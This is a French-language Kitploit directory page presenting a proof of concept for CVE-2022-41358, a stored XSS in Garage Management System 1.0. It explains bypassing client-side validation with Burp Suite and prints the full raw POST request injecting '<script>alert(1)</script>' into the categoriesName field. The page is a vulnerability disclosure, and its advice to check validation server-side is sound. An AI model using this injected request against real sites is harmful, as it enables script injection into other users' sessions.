Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/thecasual/cve-2022-41358
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubthecasual/cve-2022-41358

CVE-2022-41358

Preuve de concept de l'exploit pour CVE-2022-41358 démontrant une XSS stockée dans Garage Management System 1.0 via une altération de requête avec Burp Suite pour contourner la validation côté client.

Voir le dépôt
2il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Titre de l'exploit: Garage Management System 1.0 - 'categoriesName' - XSS stocké

Auteur de l'exploit: Sam Wallace

Lien du logiciel: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html

Version: 1.0

Testé sur: Debian

ID: CVE-2022-41358

 

Résumé:

Garage Management System utilise une validation côté client pour empêcher les XSS. En utilisant Burp, une requête peut être modifiée et rejouée vers le serveur, contournant cette validation, ce qui crée une voie pour les XSS.

 

Lorsque des messages suggèrent que la validation a lieu, c'est un bon moment pour vérifier que ces contrôles sont également effectués côté serveur.

Texte alternatif

 

Voici la requête avant toute modification dans Burp.

Texte alternatif

 

Effectuez une modification rapide dans Burp...

Texte alternatif

 

Profit !

Texte alternatif

 

Preuve

Texte alternatif

POC

root@kitploit:~
Parameter: categoriesName
URI: /garage/php_action/createCategories.php
root@kitploit:~
Host: 10.24.0.69
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.24.0.69
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.24.0.69/garage/add-category.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
Connection: close

------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesName"

<script>alert(1)</script>
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="categoriesStatus"

1
------WebKitFormBoundaryqKDsN4gmatTEEkhS
Content-Disposition: form-data; name="create"


------WebKitFormBoundaryqKDsN4gmatTEEkhS--


![Texte alternatif](https://assets.kitploit.com/production/public/readmes/33421/62c2bf87d935c7a05de7ab8f4aaa6d890f63aa3462e00f52cf81f9a74892a9a7.png "Titre optionnel")

Référence :

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41358

Télécharger l’outil